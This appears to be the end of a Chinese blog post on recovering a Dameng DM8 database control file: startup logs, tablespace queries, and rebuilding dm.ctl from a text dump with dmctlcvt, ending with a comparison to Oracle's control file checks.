Normal of DEFAULT
Normal of RECYCLE
Normal of KEEP
Normal of ROLL
Database mode = 0, oguid = 0
License will expire on 2026-01-17
begin redo pwr log collect, last ckpt lsn: 46175 ...
redo pwr log collect finished
main rfil[/home/dmdba/dmdbms/data/htdb/htdb01.log]'s grp collect 0 valid pwr record, discard 1135 invalid pwr record
EP[0]'s cur_lsn[61627], file_lsn[61627]
begin redo log recover, last ckpt lsn: 46175 ...
redo log recover finished 0
ndct db load finished, code:0
ndct second level fill fast pool finished
ndct third level fill fast pool finished
ndct second level fill fast pool finished
ndct third level fill fast pool finished
ndct fill fast pool finished
pseg_set_gtv_trxid_low next_trxid in mem:[26039]
pseg_collect_mgr_items, total collect 0 active_trxs, 0 cmt_trxs, 0 pre_cmt_trxs, 0 to_release_trxs,
    0 active_pages, 0 cmt_pages, 0 pre_cmt_pages, 0 to_release_pages, 0 mgr pages, 0 mgr recs!
next_trxid in mem:[28041]
next_trxid = 30043.
pseg recv finished
nsvr_startup end.
uthr_pipe_create, create pipe[read:10, write:11]
uthr_pipe_create, create pipe[read:12, write:13]
uthr_pipe_create, create pipe[read:14, write:15]
uthr_pipe_create, create pipe[read:16, write:17]
uthr_pipe_create, create pipe[read:18, write:19]
uthr_pipe_create, create pipe[read:20, write:21]
uthr_pipe_create, create pipe[read:22, write:23]
uthr_pipe_create, create pipe[read:24, write:25]
uthr_pipe_create, create pipe[read:26, write:27]
uthr_pipe_create, create pipe[read:28, write:29]
uthr_pipe_create, create pipe[read:30, write:31]
uthr_pipe_create, create pipe[read:32, write:33]
uthr_pipe_create, create pipe[read:34, write:35]
uthr_pipe_create, create pipe[read:36, write:37]
uthr_pipe_create, create pipe[read:38, write:39]
uthr_pipe_create, create pipe[read:40, write:41]
aud sys init success.
aud rt sys init success.
systables desc init success.
ndct_db_load_info finished, code:0.
nsvr_process_before_open begin.
nsvr_process_before_open success.
SYSTEM IS READY.
purg2_crash_cmt_trx end, total 0 trx, 0 pages purged

启动数据库成功,查询相关信息

SQL> select TABLESPACE_NAME from dba_tablespaces;

行号     TABLESPACE_NAME
---------- ---------------
1          SYSTEM
2          ROLL
3          TEMP
4          MAIN
5          TBS_XFF
6          MAIN

6 rows got

已用时间: 4.257(毫秒). 执行号:602.
SQL> select count(*) from t_xff;

行号     COUNT(*)            
---------- --------------------
1          700160

已用时间: 2.893(毫秒). 执行号:603.

使用重建ctl文件方式恢复
1. 使用dmctlcvt把备份ctl转换为txt文件

[dmdba@localhost htdb]$ dmctlcvt  help
DMCTLCVT V8
version: 03134284336-20250117-257733-20132

格式: ./dmctlcvt KEYWORD=value
注意: 控制文件名称必须指定为dm.ctl、dmmpp.ctl、dss.ctl

关键字              说明
--------------------------------------------------------------------------------
TYPE                1 转换控制文件为文本文件(源文件路径中控制文件名称必须是dm.ctl或dmmpp.ctl或dss.ctl)
                    2 转换文本文件为控制文件(目标文件路径中控制文件名称必须是dm.ctl或dmmpp.ctl或dss.ctl)
SRC                 源文件路径
DEST                目标文件路径
DCR_INI             dmdcr.ini文件路径
HELP                打印帮助信息

示例:
./dmctlcvt TYPE=1 SRC=/opt/dmdbms/data/dameng/dm.ctl DEST=/opt/dmdbms/data/dameng/dmctl.txt
./dmctlcvt TYPE=2 SRC=/opt/dmdbms/data/dameng/dmctl.txt DEST=/opt/dmdbms/data/dameng/dm.ctl
[dmdba@localhost htdb]$ dmctlcvt TYPE=1 SRC=dm_20250426213636_630282.ctl DEST=/tmp/ctl.txt
DMCTLCVT V8
convert ctl to txt success!

2. 查看ctl.txt文件中是的表空间和数据文件信息是否正确,如果确实可以参考达梦日志中相关创建信息参考其他表空间信息进行完善,并注意修改next_ts_id=6值
2025-04-26 21:36:36.600 [INFO] database P0000002216 T0000000000000002387 ifun_add_file_low initialize file[0] of ts[5], file_path[/home/dmdba/dmdbms/data/htdb/tbs_xff01.dbf]!
dm_rectl


3. 利用该txt文件重建ctl文件

[dmdba@localhost ctl_bak]$ dmctlcvt TYPE=2 SRC=/tmp/ctl.txt DEST=/home/dmdba/dmdbms/data/htdb/dm.ctl
DMCTLCVT V8
convert txt to ctl success!

4. 启动数据库并进行验证

[dmdba@localhost ~]$ dmserver path=/home/dmdba/dmdbms/data/htdb/dm.ini
file dm.key not found, use default license!
version info: develop
csek2_vm_t = 1440
nsql_vm_t = 328
prjt2_vm_t = 176
ltid_vm_t = 216
nins2_vm_t = 1120
nset2_vm_t = 272
…………
aud sys init success.
aud rt sys init success.
systables desc init success.
ndct_db_load_info finished, code:0.
nsvr_process_before_open begin.
nsvr_process_before_open success.
SYSTEM IS READY.
purg2_crash_cmt_trx end, total 0 trx, 0 pages purged
[dmdba@localhost ctl_bak]$ disql
disql V8
用户名:sysdba
密码:
[-2501]:用户名或密码错误.
用户名:sysdba
密码:

服务器[LOCALHOST:5236]:处于普通打开状态
登录使用时间 : 4.624(ms)
SQL> select tablespace_name from dba_tablespaces;

行号     TABLESPACE_NAME
---------- ---------------
1          SYSTEM
2          ROLL
3          TEMP
4          MAIN
5          TBS_XFF
6          MAIN

6 rows got

已用时间: 9.326(毫秒). 执行号:701.
SQL> select count(1) from t_xff;

行号     COUNT(1)            
---------- --------------------
1          700160

已用时间: 2.916(毫秒). 执行号:702.
SQL> 

基于此,对于dm的control损坏/丢失一般可以通过以上两种方法实现恢复,这里可以明显感觉到dm的control相对于oracle的control文件中少了相关的一致性检测